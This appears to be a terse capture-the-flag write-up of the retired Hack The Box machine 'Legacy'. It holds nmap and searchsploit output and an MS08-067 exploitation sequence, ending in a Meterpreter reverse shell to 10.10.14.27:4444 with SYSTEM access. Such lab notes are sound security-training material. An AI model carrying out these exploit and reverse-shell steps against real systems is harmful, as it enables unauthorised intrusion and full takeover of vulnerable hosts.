Legacy ''' ENUMERATION NMAP: - 139: Microsoft Windows netbios-ssn - 445: Windows XP microsoft-ds - 3389: ms-wbt-server - OS: OSs: Windows, Windows XP - smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) ''' VULNERABILITIES $ nmap --script vuln -p 445 10.10.10.4 smb-vuln-ms08-067: | VULNERABLE: | Microsoft Windows system vulnerable to remote code execution (MS08-067) | State: LIKELY VULNERABLE | IDs: CVE:CVE-2008-4250 | The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, | Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary | code via a crafted RPC request that triggers the overflow during path canonicalization. ''' SEARCHSPLOIT kali@kali:~/HTB/RETIRED/Legacy$ searchsploit 08-067 -------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------- --------------------------------- Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067) | windows/remote/40279.py Microsoft Windows Server - Code Execution (MS08-067) | windows/remote/7104.c Microsoft Windows Server - Code Execution (PoC) (MS08-067) | windows/dos/6824.txt Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (M | windows/remote/16362.rb Microsoft Windows Server - Universal Code Execution (MS08-067) | windows/remote/6841.txt Microsoft Windows Server 2000/2003 - Code Execution (MS08-067) | windows/remote/7132.py -------------------------------------------------------------------------------- --------------------------------- ''' EXPLOIT $ python /usr/share/exploitdb/exploits/windows/remote/40279.py ----------------------------------- kali@kali:~/HTB/RETIRED/Legacy$ python /usr/share/exploitdb/exploits/windows/remote/40279.py 10.10.10.4 ####################################################################### # MS08-067 Exploit # This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/). # The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi ####################################################################### Usage: /usr/share/exploitdb/exploits/windows/remote/40279.py Example: MS08_067.py 192.168.1.1 1 for Windows XP SP0/SP1 Universal Example: MS08_067.py 192.168.1.1 2 for Windows 2000 Universal ------------------------------------ it didn't work... Windows XP SP0/SP1 Universal [-]Initiating connection Exception in thread Thread-1: Traceback (most recent call last): ------------------------------------ EXPLOIT meterpreter msf5 exploit(windows/smb/ms08_067_netapi) > run [*] Started reverse TCP handler on 10.10.14.27:4444 [*] 10.10.10.4:445 - Attempting to trigger the vulnerability... [*] Sending stage (176195 bytes) to 10.10.10.4 [*] Meterpreter session 1 opened (10.10.14.27:4444 -> 10.10.10.4:1030) at 2020-07-19 18:14:07 -0400 meterpreter > pwd C:\WINDOWS\system32 meterpreter > whoami [-] Unknown command: whoami. meterpreter > uname [-] Unknown command: uname. meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > already had root!